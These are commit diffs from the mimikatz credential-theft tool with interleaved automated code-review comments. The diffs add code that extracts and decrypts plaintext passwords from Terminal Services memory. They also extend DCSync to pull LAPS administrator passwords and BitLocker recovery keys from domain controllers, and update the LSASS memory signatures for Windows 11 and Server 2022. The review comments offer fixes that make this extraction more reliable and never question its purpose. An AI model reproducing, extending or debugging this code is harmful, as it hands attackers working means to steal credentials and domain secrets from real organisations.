if(pKiwiData->cbPassword && (MIMIKATZ_NT_BUILD_NUMBER >= KULL_M_WIN_MIN_BUILD_10))
{
decStatus = kull_m_crypto_remote_CryptUnprotectMemory(aProcess.hMemory, pKiwiData->Password, sizeof(pKiwiData->Password), CRYPTPROTECTMEMORY_SAME_PROCESS);
}
else decStatus = TRUE;
if(decStatus)
{
kprintf(L" Password/Pin: %.*s\n", pKiwiData->cbPassword / sizeof(wchar_t), pKiwiData->Password);
}
}
}
}
}
}
else if(RtlEqualMemory(MyWebPattern, CurrentPtr, sizeof(MyWebPattern)))
{
pWebKiwiData = (PWTS_WEB_KIWI) CurrentPtr;
if(
(pWebKiwiData->Username.Buffer && !((ULONG_PTR) pWebKiwiData->Username.Buffer % 2) && ((ULONG_PTR) pWebKiwiData->Username.Buffer < 0x1000))
&&
(pWebKiwiData->Username.Length && !(pWebKiwiData->Username.Length % sizeof(wchar_t)) && (pWebKiwiData->Username.Length < ((WTS_USERNAME_LENGTH + 1) * sizeof(wchar_t))) && ((pWebKiwiData->Username.Length == pWebKiwiData->Username.MaximumLength) || (pWebKiwiData->Username.Length == (pWebKiwiData->Username.MaximumLength - sizeof(wchar_t)))))
)
{
if(
(pWebKiwiData->Password.Buffer && !((ULONG_PTR) pWebKiwiData->Password.Buffer % 2) && ((ULONG_PTR) pWebKiwiData->Password.Buffer < 0x1000))
&&
(pWebKiwiData->Password.Length && !(pWebKiwiData->Password.Length % sizeof(wchar_t)) && (pWebKiwiData->Password.Length < ((WTS_PASSWORD_LENGTH + 1) * sizeof(wchar_t))) && ((pWebKiwiData->Password.Length == pWebKiwiData->Password.MaximumLength) || (pWebKiwiData->Password.Length == (pWebKiwiData->Password.MaximumLength - sizeof(wchar_t)))))
)
{
// Domain is not mandatory here
kprintf(L"\n * Web Credentials? *\n");
ref = (PBYTE) aProcess.address + (CurrentPtr - (PBYTE) aLocalBuffer.address);
if(
(pWebKiwiData->Domain.Buffer && !((ULONG_PTR) pWebKiwiData->Domain.Buffer % 2) && ((ULONG_PTR) pWebKiwiData->Domain.Buffer < 0x1000))
&&
(pWebKiwiData->Domain.Length && !(pWebKiwiData->Domain.Length % sizeof(wchar_t)) && (pWebKiwiData->Domain.Length < ((WTS_DOMAIN_LENGTH + 1) * sizeof(wchar_t))) && ((pWebKiwiData->Domain.Length == pWebKiwiData->Domain.MaximumLength) || (pWebKiwiData->Domain.Length == (pWebKiwiData->Domain.MaximumLength - sizeof(wchar_t)))))
)
{
pWebKiwiData->Domain.Buffer = (PWSTR) (ref + (ULONG_PTR) pWebKiwiData->Domain.Buffer);
if(kull_m_process_getUnicodeString(&pWebKiwiData->Domain, aProcess.hMemory))
{
kprintf(L" Domain : %wZ\n", &pWebKiwiData->Domain);
LocalFree(pWebKiwiData->Domain.Buffer);
}
}
pWebKiwiData->Username.Buffer = (PWSTR) (ref + (ULONG_PTR) pWebKiwiData->Username.Buffer);
if(kull_m_process_getUnicodeString(&pWebKiwiData->Username, aProcess.hMemory))
{
kprintf(L" UserName : %wZ\n", &pWebKiwiData->Username);
LocalFree(pWebKiwiData->Username.Buffer);
}
pWebKiwiData->Password.Buffer = (PWSTR) (ref + (ULONG_PTR) pWebKiwiData->Password.Buffer);
if(kull_m_process_getUnicodeString(&pWebKiwiData->Password, aProcess.hMemory))
{
decStatus = kull_m_crypto_remote_CryptUnprotectMemory(aProcess.hMemory, pWebKiwiData->Password.Buffer, pWebKiwiData->Password.Length, CRYPTPROTECTMEMORY_SAME_PROCESS);
if(decStatus)
{
kprintf(L" Password/Pin: %.*s\n", pKiwiData->cbPassword / sizeof(wchar_t), pKiwiData->Password);
dwOffset = (lstrlen(pWebKiwiData->Password.Buffer) + 1) * sizeof(wchar_t);
kprintf(L" Password/Pin: %s\n ", pWebKiwiData->Password.Buffer);
}
else kuhl_m_sekurlsa_trymarshal(&pWebKiwiData->Password);
LocalFree(pWebKiwiData->Password.Buffer);
}
}
}
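Review bot: In the new web-credential branch the decrypted value is printed with `kprintf(L" Password/Pin: %s\n ", pWebKiwiData->Password.Buffer);` — the format has a stray trailing space after the newline, and both `%s` and the `lstrlen` feeding dwOffset rely on the buffer being NUL-terminated, which nothing in the hunk shows `kull_m_process_getUnicodeString` guarantees; the sibling branch uses a bounded `%.*s` with the byte length divided by `sizeof(wchar_t)`, and the same form here (`pWebKiwiData->Password.Length / sizeof(wchar_t)`) would avoid reading past the copied bytes. `dwOffset` is assigned but not used anywhere visible in the hunk; if it is consumed later a short comment saying so would help, otherwise it is dead. The loop stride change from `CurrentPtr++` to `CurrentPtr += sizeof(PVOID)` also applies to the pre-existing MyPattern/MyPattern2/MyPattern3 matching, which presumably now skips candidates that are not pointer-aligned — confirm that is intended. The enclosing function ends outside the hunk.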


@ -10,6 +10,7 @@
#include "../../modules/kull_m_process.h"
#include "../../modules/kull_m_memory.h"
#include "../../modules/kull_m_crypto_remote.h"
#include "sekurlsa/kuhl_m_sekurlsa.h"
const KUHL_M kuhl_m_ts;
@ -228,6 +229,14 @@ typedef struct _WTS_KIWI {
} WTS_KIWI, *PWTS_KIWI;
#pragma pack(pop)
typedef struct _WTS_WEB_KIWI {
DWORD dwVersion;
UNICODE_STRING Domain;
UNICODE_STRING Username;
UNICODE_STRING Password;
//BYTE Data[ANYSIZE_ARRAY];
} WTS_WEB_KIWI, *PWTS_WEB_KIWI;
typedef struct _TS_PROPERTY_KIWI {
PCWSTR szProperty;
DWORD dwType;


@ -16,6 +16,7 @@ LPCSTR kuhl_m_lsadump_dcsync_oids[] = {
szOID_ANSI_userAccountControl, szOID_ANSI_accountExpires, szOID_ANSI_pwdLastSet,
szOID_ANSI_objectSid, szOID_ANSI_sIDHistory,
szOID_ANSI_unicodePwd, szOID_ANSI_ntPwdHistory, szOID_ANSI_dBCSPwd, szOID_ANSI_lmPwdHistory, szOID_ANSI_supplementalCredentials,
szOID_ANSI_msFVEKeyPackage, szOID_ANSI_msFVERecoveryGuid, szOID_ANSI_msFVEVolumeGuid, szOID_ANSI_msFVERecoveryPassword,
szOID_ANSI_trustPartner, szOID_ANSI_trustAuthIncoming, szOID_ANSI_trustAuthOutgoing,
szOID_ANSI_currentValue,
szOID_isDeleted,
@ -25,6 +26,8 @@ LPCSTR kuhl_m_lsadump_dcsync_oids_export[] = {
szOID_ANSI_sAMAccountName, szOID_ANSI_objectSid,
szOID_ANSI_userAccountControl,
szOID_ANSI_unicodePwd,
szOID_ANSI_msFVEKeyPackage, szOID_ANSI_msFVERecoveryGuid, szOID_ANSI_msFVEVolumeGuid, szOID_ANSI_msFVERecoveryPassword,
szOID_ANSI_currentValue,
szOID_isDeleted,
};
NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
@ -35,7 +38,7 @@ NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
DRS_HANDLE hDrs = NULL;
DSNAME dsName = {0};
DRS_MSG_GETCHGREQ getChReq = {0};
DWORD dwOutVersion = 0, i, AuthnSvc;
DWORD dwOutVersion = 0, i, AuthnSvc, suppAtt = 0;
DRS_MSG_GETCHGREPLY getChRep;
ULONG drsStatus;
LPCWSTR szUser = NULL, szGuid = NULL, szDomain = NULL, szDc = NULL, szService;
@ -43,6 +46,9 @@ NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
DRS_EXTENSIONS_INT DrsExtensionsInt;
BOOL someExport = kull_m_string_args_byName(argc, argv, L"export", NULL, NULL), allData = kull_m_string_args_byName(argc, argv, L"all", NULL, NULL), csvOutput = kull_m_string_args_byName(argc, argv, L"csv", NULL, NULL), withDeleted = kull_m_string_args_byName(argc, argv, L"deleted", NULL, NULL), decodeUAC = kull_m_string_args_byName(argc, argv, L"uac", NULL, NULL), bAuthNtlm = kull_m_string_args_byName(argc, argv, L"authntlm", NULL, NULL);
SEC_WINNT_AUTH_IDENTITY secIdentity = {NULL, 0, NULL, 0, NULL, 0, SEC_WINNT_AUTH_IDENTITY_UNICODE};
PWCHAR dn;
PLDAP ld;
ATTRTYP SuppATT_IntId[2] = {0, 0}; // [0] msMcsAdmPwd, [1] msMcsAdmPwdExpirationTime
if(!kull_m_string_args_byName(argc, argv, L"domain", &szDomain, NULL))
if(kull_m_net_getCurrentDomainInfo(&pPolicyDnsDomainInfo))
@ -68,6 +74,27 @@ NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
kprintf(L"[DC] \'%s\' will be the user account\n", szUser);
kull_m_rpc_getArgs(argc, argv, NULL, NULL, NULL, &szService, L"ldap", &AuthnSvc, ((MIMIKATZ_NT_MAJOR_VERSION < 6) ? RPC_C_AUTHN_GSS_KERBEROS : RPC_C_AUTHN_GSS_NEGOTIATE), NULL, &secIdentity, NULL, TRUE);
if(kull_m_string_args_byName(argc, argv, L"laps", NULL, NULL))
{
if(kull_m_ldap_getLdapAndRootDN(szDc, L"schemaNamingContext", &ld, &dn, secIdentity.UserLength ? &secIdentity : NULL))
{
if(
kuhl_m_lsadump_dcsync_SearchAndParseLDAPToIntId(ld, dn, L"(&(objectclass=attributeSchema)(attributeID=" TEXT(szOID_ANSI_msMcsAdmPwd) L"))", SuppATT_IntId + 0)
&&
kuhl_m_lsadump_dcsync_SearchAndParseLDAPToIntId(ld, dn, L"(&(objectclass=attributeSchema)(attributeID=" TEXT(szOID_ANSI_msMcsAdmPwdExpirationTime) L"))", SuppATT_IntId + 1)
)
{
if(SuppATT_IntId[0] && SuppATT_IntId[1])
{
suppAtt = 2;
}
}
LocalFree(dn);
ldap_unbind(ld);
}
}
if(kull_m_rpc_createBinding(NULL, L"ncacn_ip_tcp", szDc, NULL, szService, TRUE, bAuthNtlm ? RPC_C_AUTHN_WINNT : ((MIMIKATZ_NT_MAJOR_VERSION < 6) ? RPC_C_AUTHN_GSS_KERBEROS : RPC_C_AUTHN_GSS_NEGOTIATE), secIdentity.UserLength ? &secIdentity : NULL, RPC_C_IMP_LEVEL_DEFAULT, &hBinding, kull_m_rpc_drsr_RpcSecurityCallback))
{
if(kull_m_rpc_drsr_getDomainAndUserInfos(&hBinding, szDc, szDomain, &getChReq.V8.uuidDsaObjDest, szUser, szGuid, &dsName.Guid, &DrsExtensionsInt))
@ -82,10 +109,11 @@ NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
getChReq.V8.cMaxBytes = 0x00a00000; // 10M
getChReq.V8.ulExtendedOp = (allData ? 0 : EXOP_REPL_OBJ);
if(getChReq.V8.pPartialAttrSet = (PARTIAL_ATTR_VECTOR_V1_EXT *) MIDL_user_allocate(sizeof(PARTIAL_ATTR_VECTOR_V1_EXT) + sizeof(ATTRTYP) * ((allData ? ARRAYSIZE(kuhl_m_lsadump_dcsync_oids_export) : ARRAYSIZE(kuhl_m_lsadump_dcsync_oids)) - 1)))
if(getChReq.V8.pPartialAttrSet = (PARTIAL_ATTR_VECTOR_V1_EXT *) MIDL_user_allocate(sizeof(PARTIAL_ATTR_VECTOR_V1_EXT) + sizeof(ATTRTYP) * (suppAtt + (allData ? ARRAYSIZE(kuhl_m_lsadump_dcsync_oids_export) : ARRAYSIZE(kuhl_m_lsadump_dcsync_oids)) - 1)))
{
getChReq.V8.pPartialAttrSet->dwVersion = 1;
getChReq.V8.pPartialAttrSet->dwReserved1 = 0;
if(allData)
{
getChReq.V8.pPartialAttrSet->cAttrs = ARRAYSIZE(kuhl_m_lsadump_dcsync_oids_export);
@ -98,6 +126,13 @@ NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
for(i = 0; i < getChReq.V8.pPartialAttrSet->cAttrs; i++)
kull_m_rpc_drsr_MakeAttid(&getChReq.V8.PrefixTableDest, kuhl_m_lsadump_dcsync_oids[i], &getChReq.V8.pPartialAttrSet->rgPartialAttr[i], TRUE);
}
if(suppAtt)
{
getChReq.V8.pPartialAttrSet->rgPartialAttr[getChReq.V8.pPartialAttrSet->cAttrs++] = SuppATT_IntId[0];
getChReq.V8.pPartialAttrSet->rgPartialAttr[getChReq.V8.pPartialAttrSet->cAttrs++] = SuppATT_IntId[1];
}
RpcTryExcept
{
do
@ -116,7 +151,7 @@ NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
if(csvOutput)
kuhl_m_lsadump_dcsync_descrObject_csv(&getChRep.V6.PrefixTableSrc, &pObject[0].Entinf.AttrBlock, withDeleted, decodeUAC);
else
kuhl_m_lsadump_dcsync_descrObject(&getChRep.V6.PrefixTableSrc, &pObject[0].Entinf.AttrBlock, szDomain, someExport);
kuhl_m_lsadump_dcsync_descrObject(&getChRep.V6.PrefixTableSrc, &pObject[0].Entinf.AttrBlock, szDomain, someExport, SuppATT_IntId, ARRAYSIZE(SuppATT_IntId));
pObject = pObject->pNextEntInf;
}
}
@ -166,6 +201,51 @@ NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
return STATUS_SUCCESS;
}
BOOL kuhl_m_lsadump_dcsync_SearchAndParseLDAPToIntId(PLDAP ld, PWCHAR dn, PWCHAR req, ATTRTYP *pIntId)
{
BOOL status = FALSE;
PWCHAR myAttrs[] = {L"msDS-IntId", NULL};
DWORD ret;
PLDAPMessage pMessage = NULL, pEntry;
PBERVAL *pId;
PSTR tmpString;
ret = ldap_search_s(ld, dn, LDAP_SCOPE_ONELEVEL, req, myAttrs, FALSE, &pMessage);
if(ret == LDAP_SUCCESS)
{
if(ldap_count_entries(ld, pMessage) == 1)
{
if(pEntry = ldap_first_entry(ld, pMessage))
{
kprintf(L"[ldap] %s : ", ldap_get_dn(ld, pEntry));
pId = ldap_get_values_len(ld, pEntry, myAttrs[0]);
if(pId && pId[0])
{
if(tmpString = (PSTR) LocalAlloc(LPTR, pId[0]->bv_len + 1))
{
RtlCopyMemory(tmpString, pId[0]->bv_val, pId[0]->bv_len);
*pIntId = strtol(tmpString, NULL, 10);
kprintf(L"0x%08x\n", *pIntId);
status = TRUE;
LocalFree(tmpString);
}
}
else PRINT_ERROR(L"No values?\n");
}
}
else PRINT_ERROR(L"More than one entry?\n");
}
else PRINT_ERROR(L"ldap_search_s 0x%x (%u)\n", ret, ret);
if(pMessage)
{
ldap_msgfree(pMessage);
}
return status;
}
BOOL kuhl_m_lsadump_dcsync_decrypt(PBYTE encodedData, DWORD encodedDataSize, DWORD rid, LPCWSTR prefix, BOOL isHistory)
{
DWORD i;
@ -233,12 +313,15 @@ void kuhl_m_lsadump_dcsync_descrObject_csv(SCHEMA_PREFIX_TABLE *prefixTable, ATT
}
}
void kuhl_m_lsadump_dcsync_descrObject(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCWSTR szSrcDomain, BOOL someExport)
void kuhl_m_lsadump_dcsync_descrObject(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCWSTR szSrcDomain, BOOL someExport, ATTRTYP *pSuppATT_IntId, DWORD cSuppATT_IntId)
{
kull_m_rpc_drsr_findPrintMonoAttr(L"\nObject RDN : ", prefixTable, attributes, szOID_ANSI_name, TRUE);
kprintf(L"\n");
if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_sAMAccountName, NULL, NULL))
kuhl_m_lsadump_dcsync_descrUser(prefixTable, attributes);
kuhl_m_lsadump_dcsync_descrUser(prefixTable, attributes, pSuppATT_IntId, cSuppATT_IntId);
else if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_msFVERecoveryGuid, NULL, NULL))
kuhl_m_lsadump_dcsync_descrBitlocker(prefixTable, attributes, someExport);
else if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_trustPartner, NULL, NULL))
kuhl_m_lsadump_dcsync_descrTrust(prefixTable, attributes, szSrcDomain);
else if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_currentValue, NULL, NULL))
@ -292,7 +375,88 @@ LPCWSTR kuhl_m_lsadump_samAccountType_toString(DWORD accountType)
return target;
}
void kuhl_m_lsadump_dcsync_descrUser(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes)
void kuhl_m_lsadump_dcsync_descrBitlocker(SCHEMA_PREFIX_TABLE* prefixTable, ATTRBLOCK* attributes, BOOL someExport)
{
UNICODE_STRING uString = {0};
DWORD szData = 0;
PVOID data = 0;
GUID RecoveryGuid;
PWCHAR filename;
kprintf(L"** BITLOCKER RECOVERY INFORMATION **\n\n");
if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_msFVEVolumeGuid, &data, NULL))
{
kprintf(L"Volume GUID : ");
kull_m_string_displayGUID((LPCGUID) data);
kprintf(L"\n");
}
if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_msFVERecoveryGuid, &RecoveryGuid, NULL))
{
kprintf(L"Recovery GUID : ");
kull_m_string_displayGUID(&RecoveryGuid);
kprintf(L"\n");
}
else
{
UuidCreate(&RecoveryGuid);
if(someExport)
{
kprintf(L"Recovery GUID (fake) : ");
kull_m_string_displayGUID(&RecoveryGuid);
kprintf(L"\n");
}
}
if(someExport)
{
RtlStringFromGUID(&RecoveryGuid, &uString);
}
if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_msFVERecoveryPassword, &data, &szData))
{
if(szData > 0)
{
kprintf(L"Recovery Password : %s\n", data);
if(someExport)
{
if(filename = kuhl_m_crypto_generateFileName(L"ntds", L"bitlocker", 0, uString.Buffer ? uString.Buffer : L"(noguid)", L"recoveryPassword"))
{
kprintf(L"\tExport : %s - \'%s\'\n", kull_m_file_writeData(filename, (PBYTE)data, szData) ? L"OK" : L"KO", filename);
LocalFree(filename);
}
}
}
}
if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_msFVEKeyPackage, &data, &szData))
{
if(szData > 0)
{
kprintf(L"Key Package Size : %u byte(s)\nKey Package : [", szData);
kull_m_string_wprintf_hex(data, szData, 0);
kprintf(L"]\n");
if (someExport)
{
if(filename = kuhl_m_crypto_generateFileName(L"ntds", L"bitlocker", 0, uString.Buffer ? uString.Buffer : L"(noguid)", L"keyPackage"))
{
kprintf(L"\tExport : %s - \'%s\'\n", kull_m_file_writeData(filename, (PBYTE)data, szData) ? L"OK" : L"KO", filename);
LocalFree(filename);
}
}
}
}
if (uString.Buffer)
{
RtlFreeUnicodeString(&uString);
}
}
void kuhl_m_lsadump_dcsync_descrUser(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, ATTRTYP *pSuppATT_IntId, DWORD cSuppATT_IntId)
{
DWORD rid = 0, i;
PBYTE encodedData;
@ -365,6 +529,21 @@ void kuhl_m_lsadump_dcsync_descrUser(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK
kprintf(L"\nSupplemental Credentials:\n");
kuhl_m_lsadump_dcsync_descrUserProperties((PUSER_PROPERTIES) encodedData);
}
if((cSuppATT_IntId >= 2) && pSuppATT_IntId[0] && pSuppATT_IntId[1])
{
kprintf(L"LAPS:\n");
if(kull_m_rpc_drsr_findMonoAttrNoOID(attributes, pSuppATT_IntId[0], &encodedData, &encodedDataSize))
{
kprintf(L" Password : %.*S\n", encodedDataSize, encodedData);
}
if(kull_m_rpc_drsr_findMonoAttrNoOID(attributes, pSuppATT_IntId[1], &data, NULL))
{
kprintf(L" Last change: ");
kull_m_string_displayLocalFileTime((LPFILETIME) data);
kprintf(L"\n");
}
}
}
DECLARE_CONST_UNICODE_STRING(PrimaryCleartext, L"Primary:CLEARTEXT");
@ -2096,7 +2275,6 @@ BOOL kuhl_m_lsadump_dcshadow_build_replication(PDCSHADOW_DOMAIN_INFO info)
kprintf(L" uidOriginatingDsa:");
kull_m_string_displayGUID(&attr->MetaData.uidOriginatingDsa);
kprintf(L"\n");
}
kprintf(L"\n");
}
@ -3046,4 +3224,4 @@ ULONG SRV_IDL_DRSVerifyNames(DRS_HANDLE hDrs, DWORD dwInVersion, DRS_MSG_VERIFYR
ULONG SRV_IDL_DRSUpdateRefs(DRS_HANDLE hDrs, DWORD dwVersion, DRS_MSG_UPDREFS *pmsgUpdRefs)
{
return STATUS_SUCCESS;
}
}


@ -12,6 +12,8 @@
#include "../modules/rpc/kull_m_rpc_drsr.h"
#include "../kuhl_m.h"
#include "../kuhl_m_lsadump.h" // to move
#include "../modules/kull_m_string.h"
#include "../modules/kull_m_ldap.h"
NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[]);
NTSTATUS kuhl_m_lsadump_dcshadow(int argc, wchar_t * argv[]);
@ -39,13 +41,15 @@ typedef struct _USER_PROPERTIES {
const wchar_t * KUHL_M_LSADUMP_UF_FLAG[32];
BOOL kuhl_m_lsadump_dcsync_SearchAndParseLDAPToIntId(PLDAP ld, PWCHAR dn, PWCHAR req, ATTRTYP *pIntId);
BOOL kuhl_m_lsadump_dcsync_decrypt(PBYTE encodedData, DWORD encodedDataSize, DWORD rid, LPCWSTR prefix, BOOL isHistory);
void kuhl_m_lsadump_dcsync_descrObject(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCWSTR szSrcDomain, BOOL someExport);
void kuhl_m_lsadump_dcsync_descrUser(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes);
void kuhl_m_lsadump_dcsync_descrObject(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCWSTR szSrcDomain, BOOL someExport, ATTRTYP *pSuppATT_IntId, DWORD cSuppATT_IntId);
void kuhl_m_lsadump_dcsync_descrUser(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, ATTRTYP *pSuppATT_IntId, DWORD cSuppATT_IntId);
void kuhl_m_lsadump_dcsync_descrUserProperties(PUSER_PROPERTIES properties);
void kuhl_m_lsadump_dcsync_descrTrust(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCWSTR szSrcDomain);
void kuhl_m_lsadump_dcsync_descrTrustAuthentication(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, PCUNICODE_STRING domain, PCUNICODE_STRING partner, BOOL isIn);
void kuhl_m_lsadump_dcsync_descrSecret(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, BOOL someExport);
void kuhl_m_lsadump_dcsync_descrBitlocker(SCHEMA_PREFIX_TABLE* prefixTable, ATTRBLOCK* attributes, BOOL someExport);
void kuhl_m_lsadump_dcsync_descrObject_csv(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, BOOL withDeleted, BOOL decodeUAC);
typedef BOOL (*DCSHADOW_SYNTAX_ENCODER) (ATTRVAL* pVal, PWSTR szValue);


@ -188,7 +188,7 @@ NTSTATUS kuhl_m_ngc_logondata(int argc, wchar_t * argv[])
{
if(kull_m_process_getVeryBasicModuleInformationsForName(aRemote.hMemory, L"NgcCtnrSvc.dll", &iModule))
{
aRemote.address = (PBYTE) iModule.DllBase.address + /*0xB4F90;//*/0xbef10; // ContainerManager -- InternalUninitializeService@@YAXXZ proc near
aRemote.address = (PBYTE) iModule.DllBase.address + /*0xB4F90;//*0xbef10*/0xA7E60; // ContainerManager -- InternalUninitializeService@@YAXXZ proc near
if(kull_m_memory_copy(&aLocalBuffer, &aRemote, sizeof(containerManager)))
{
aRemote.address = containerManager.unk7;
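Review bot: The new module offset `0xA7E60` on the `aRemote.address = (PBYTE) iModule.DllBase.address + ...` line is a build-specific constant, but the comment records only the symbol it points at, not which NgcCtnrSvc.dll version it was taken from, and the two superseded values are now buried in a nested comment-out. Nothing in the hunk checks the module version before `kull_m_memory_copy` reads through the offset, so the next person to update it cannot tell which builds still work. I would drop the dead values and write `// ContainerManager -- InternalUninitializeService@@YAXXZ; offset valid for NgcCtnrSvc.dll <version checked> only` with the version filled in. The enclosing function starts outside the hunk.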


@ -1419,7 +1419,7 @@ VOID kuhl_m_sekurlsa_trymarshal(PCUNICODE_STRING MarshaledCredential)
kprintf(L"[UsernameForPacked] ?");
break;
default:
kprintf(L"[?] ?");
kprintf(L"[?] ? %u ?", type);
}
CredFree(Credential);
}


@ -18,6 +18,7 @@ BYTE PTRN_WN63_LogonSessionList[] = {0x8b, 0xde, 0x48, 0x8d, 0x0c, 0x5b, 0x48, 0
BYTE PTRN_WN6x_LogonSessionList[] = {0x33, 0xff, 0x41, 0x89, 0x37, 0x4c, 0x8b, 0xf3, 0x45, 0x85, 0xc0, 0x74};
BYTE PTRN_WN1703_LogonSessionList[] = {0x33, 0xff, 0x45, 0x89, 0x37, 0x48, 0x8b, 0xf3, 0x45, 0x85, 0xc9, 0x74};
BYTE PTRN_WN1803_LogonSessionList[] = {0x33, 0xff, 0x41, 0x89, 0x37, 0x4c, 0x8b, 0xf3, 0x45, 0x85, 0xc9, 0x74};
BYTE PTRN_WN11_LogonSessionList[] = {0x45, 0x89, 0x34, 0x24, 0x4c, 0x8b, 0xff, 0x8b, 0xf3, 0x45, 0x85, 0xc0, 0x74};
KULL_M_PATCH_GENERIC LsaSrvReferences[] = {
{KULL_M_WIN_BUILD_XP, {sizeof(PTRN_WIN5_LogonSessionList), PTRN_WIN5_LogonSessionList}, {0, NULL}, {-4, 0}},
{KULL_M_WIN_BUILD_2K3, {sizeof(PTRN_WIN5_LogonSessionList), PTRN_WIN5_LogonSessionList}, {0, NULL}, {-4, -45}},
@ -29,6 +30,7 @@ KULL_M_PATCH_GENERIC LsaSrvReferences[] = {
{KULL_M_WIN_BUILD_10_1703, {sizeof(PTRN_WN1703_LogonSessionList), PTRN_WN1703_LogonSessionList}, {0, NULL}, {23, -4}},
{KULL_M_WIN_BUILD_10_1803, {sizeof(PTRN_WN1803_LogonSessionList), PTRN_WN1803_LogonSessionList}, {0, NULL}, {23, -4}},
{KULL_M_WIN_BUILD_10_1903, {sizeof(PTRN_WN6x_LogonSessionList), PTRN_WN6x_LogonSessionList}, {0, NULL}, {23, -4}},
{KULL_M_WIN_BUILD_2022, {sizeof(PTRN_WN11_LogonSessionList), PTRN_WN11_LogonSessionList}, {0, NULL}, {24, -4}},
};
#elif defined(_M_IX86)
BYTE PTRN_WN51_LogonSessionList[] = {0xff, 0x50, 0x10, 0x85, 0xc0, 0x0f, 0x84};
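Review bot: The new row in `LsaSrvReferences` keys `PTRN_WN11_LogonSessionList` at `KULL_M_WIN_BUILD_2022` (20348 in the header this commit touches) although the pattern is named for Windows 11, so a reader cannot tell whether the 13-byte signature and the `{24, -4}` offsets were verified on Server 2022 or only on 22000+; the same commit adds `KULL_M_WIN_MIN_BUILD_11` but does not use it here. If both were checked, say so next to the row, e.g. `// verified on Server 2022 (20348) and Windows 11 (22000+)`; if only Windows 11 was, key the row at the Windows 11 build instead. The table presumably selects by minimum build, so the key decides what a Server 2022 LSASS gets.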


@ -6,7 +6,7 @@
#include "kuhl_m_sekurlsa_cloudap.h"
#if defined(_M_X64)
BYTE PTRN_WALL_CloudApLocateLogonSession[] = {0x44, 0x8b, 0x01, 0x44, 0x39, 0x42, 0x18, 0x75};
BYTE PTRN_WALL_CloudApLocateLogonSession[] = {0x44, 0x8b, 0x01, 0x44, 0x39, 0x42};//, 0x18, 0x75};
KULL_M_PATCH_GENERIC CloudApReferences[] = {
{KULL_M_WIN_BUILD_10_1909, {sizeof(PTRN_WALL_CloudApLocateLogonSession), PTRN_WALL_CloudApLocateLogonSession}, {0, NULL}, {-9}},
};
@ -35,7 +35,7 @@ void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_cloudap(IN PKIWI_BASIC_SECURIT
KULL_M_MEMORY_ADDRESS aLocalMemory = {&logon, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aLsassMemory = {NULL, pData->cLsass->hLsassMem};
KIWI_GENERIC_PRIMARY_CREDENTIAL creds = {0};
if(kuhl_m_sekurlsa_cloudap_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(pData->cLsass, &kuhl_m_sekurlsa_cloudap_package.Module, CloudApReferences, ARRAYSIZE(CloudApReferences), (PVOID *) &CloudApGlobalLogonSessionList, NULL, NULL, NULL)/*(CloudApGlobalLogonSessionList = (PKIWI_CLOUDAP_LOGON_LIST_ENTRY) ((PBYTE) kuhl_m_sekurlsa_cloudap_package.Module.Informations.DllBase.address + 0x71100))*/)
if(kuhl_m_sekurlsa_cloudap_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(pData->cLsass, &kuhl_m_sekurlsa_cloudap_package.Module, CloudApReferences, ARRAYSIZE(CloudApReferences), (PVOID *) &CloudApGlobalLogonSessionList, NULL, NULL, NULL))
{
aLsassMemory.address = CloudApGlobalLogonSessionList;
if(aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(&aLsassMemory, FIELD_OFFSET(KIWI_CLOUDAP_LOGON_LIST_ENTRY, LocallyUniqueIdentifier), pData->LogonId))
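Review bot: Shortening `PTRN_WALL_CloudApLocateLogonSession` from 8 to 6 bytes drops the displacement byte and the conditional-jump opcode, so the signature is less specific while the `{-9}` relative offset in `CloudApReferences` is unchanged; a spurious match elsewhere in cloudap.dll would hand back a bogus `CloudApGlobalLogonSessionList` that the list walk below then dereferences in LSASS memory. If the two bytes were dropped because they differ on a newer build (the bytes left as a trailing comment suggest that), a second table row with the full new pattern keyed at that build is safer than one weaker pattern for every build. At minimum record the reason on the line: `// displacement/jcc bytes omitted: differ on <build>`.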


@ -75,4 +75,19 @@ typedef struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY {
DWORD64 unk3;
PKIWI_CLOUDAP_CACHE_LIST_ENTRY cacheEntry;
// ...
} KIWI_CLOUDAP_LOGON_LIST_ENTRY, *PKIWI_CLOUDAP_LOGON_LIST_ENTRY;
